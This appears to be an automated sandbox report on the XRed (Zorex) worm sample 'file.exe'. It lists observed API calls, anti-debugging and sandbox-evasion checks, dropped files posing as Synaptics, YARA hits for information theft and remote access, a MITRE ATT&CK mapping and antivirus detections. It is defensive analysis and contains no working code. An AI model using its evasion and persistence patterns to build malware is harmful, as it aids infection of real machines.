Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6712	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\SrTasks.exe TID: 7236	Thread sleep time: -70000s >= -30000s

Source: C:\Windows\System32\SrTasks.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007FFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 007FFE5Dh	2_2_007FFDC2
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007FFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 007FFE56h	2_2_007FFDC2
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E7FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00E7FE5Dh	3_2_00E7FDC2
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E7FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00E7FE56h	3_2_00E7FDC2
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C4FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00C4FE5Dh	8_2_00C4FDC2
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C4FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00C4FE56h	8_2_00C4FDC2
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0074FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0074FE5Dh	18_2_0074FDC2
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0074FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0074FE56h	18_2_0074FDC2

Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	File Volume queried: C:\Windows FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_00804315 FindFirstFileW,FindClose,	2_2_00804315
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007D993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_007D993E
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F7A87 FindFirstFileExW,	2_2_007F7A87
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007C3BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_007C3BC3
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E84315 FindFirstFileW,FindClose,	3_2_00E84315
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E5993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	3_2_00E5993E
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E43BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	3_2_00E43BC3
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E77A87 FindFirstFileExW,	3_2_00E77A87
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD565CB FindFirstFileW,FindClose,	3_2_6CD565CB
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD66C8C FindFirstFileExA,	3_2_6CD66C8C
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C54315 FindFirstFileW,FindClose,	8_2_00C54315
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C2993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	8_2_00C2993E
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C13BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	8_2_00C13BC3
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C47A87 FindFirstFileExW,	8_2_00C47A87
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00754315 FindFirstFileW,FindClose,	18_2_00754315
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0072993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	18_2_0072993E
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00747A87 FindFirstFileExW,	18_2_00747A87
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00713BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	18_2_00713BC3
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E565CB FindFirstFileW,FindClose,	20_2_62E565CB
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E66C8C FindFirstFileExA,	20_2_62E66C8C

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_0080962D VirtualQuery,GetSystemInfo,

2_2_0080962D

Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: SrTasks.exe, 0000000E.00000003.2699221162.000001944D76C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:QQ?H
Source: SrTasks.exe, 0000000E.00000003.2699221162.000001944D76C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: file.exe, 00000000.00000003.2171491815.0000000001498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2
Source: SrTasks.exe, 0000000E.00000003.2598586444.000001944D76C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:QQ?H
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: SrTasks.exe, 0000000E.00000003.3204647725.000001944D76C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:QQ?HP@wM
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.3994431866.00000000006F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SrTasks.exe, 0000000E.00000003.2991459390.000001944D76C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ice\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: SrTasks.exe, 0000000E.00000003.3204647725.000001944D76C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ice\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61c

Source: C:\Users\user\Desktop\._cache_file.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007EE625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_007EE625

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe

Code function: 3_2_6CD51C04 LoadLibraryW,GetProcAddress,GetLastError,FreeLibrary,

3_2_6CD51C04

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F4812 mov eax, dword ptr fs:[00000030h]	2_2_007F4812
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E74812 mov eax, dword ptr fs:[00000030h]	3_2_00E74812
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD63C07 mov eax, dword ptr fs:[00000030h]	3_2_6CD63C07
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C44812 mov eax, dword ptr fs:[00000030h]	8_2_00C44812
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00744812 mov eax, dword ptr fs:[00000030h]	18_2_00744812
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E63C07 mov eax, dword ptr fs:[00000030h]	20_2_62E63C07

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007C38D4 GetProcessHeap,RtlAllocateHeap,

2_2_007C38D4

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007EE188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_007EE188
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007EE625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_007EE625
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007EE773 SetUnhandledExceptionFilter,	2_2_007EE773
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F3BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_007F3BB0
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E6E188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00E6E188
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E6E625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00E6E625
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E6E773 SetUnhandledExceptionFilter,	3_2_00E6E773
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E73BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00E73BB0
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD5EC77 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CD5EC77
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD5E730 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CD5E730
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD609E7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CD609E7
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C3E188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00C3E188
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C3E625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00C3E625
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C3E773 SetUnhandledExceptionFilter,	8_2_00C3E773
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C43BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00C43BB0
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0073E188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0073E188
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0073E625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0073E625
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0073E773 SetUnhandledExceptionFilter,	18_2_0073E773
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00743BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00743BB0
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E609E7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_62E609E7
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E5E730 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_62E5E730
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E5EC77 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_62E5EC77

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Process created: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe "C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=644 -burn.filehandle.self=652	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Process created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe "C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{C5083B7D-B45A-4E12-82C2-69D6A2D5E9AA} {2D07A715-CF60-42B0-9715-B6AF208420A8} 5272	Jump to behavior
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Process created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.clean.room="C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.filehandle.attached=532 -burn.filehandle.self=540

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_008015CB InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

2_2_008015CB

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_0080393B AllocateAndInitializeSid,CheckTokenMembership,

2_2_0080393B

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007EE9A7 cpuid

2_2_007EE9A7

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Queries volume information: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\logo.png VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\logo.png VolumeInformation

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007D4CE8 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,

2_2_007D4CE8

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_0080858F GetSystemTime,

2_2_0080858F

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007C60BA GetUserNameW,GetLastError,

2_2_007C60BA

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_00808733 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

2_2_00808733

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007C508D GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,

2_2_007C508D

Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected XRed

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 00000004.00000003.2242519374.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCXD314.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Remote Access Functionality

Yara detected XRed

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 00000004.00000003.2242519374.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCXD314.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	41 Scripting	2 Replication Through Removable Media	4 Native API	41 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	12 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	1 Extra Window Memory Injection	2 Obfuscated Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	21 Windows Service	1 Access Token Manipulation	1 DLL Side-Loading	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	21 Windows Service	1 File Deletion	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	34 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 Extra Window Memory Injection	LSA Secrets	37 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	32 Masquerading	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	11 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	87%	ReversingLabs	Win32.Worm.Zorex
file.exe	100%	Avira	WORM/Delphi.Gen
file.exe	100%	Avira	W2000M/Dldr.Agent.17651006
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
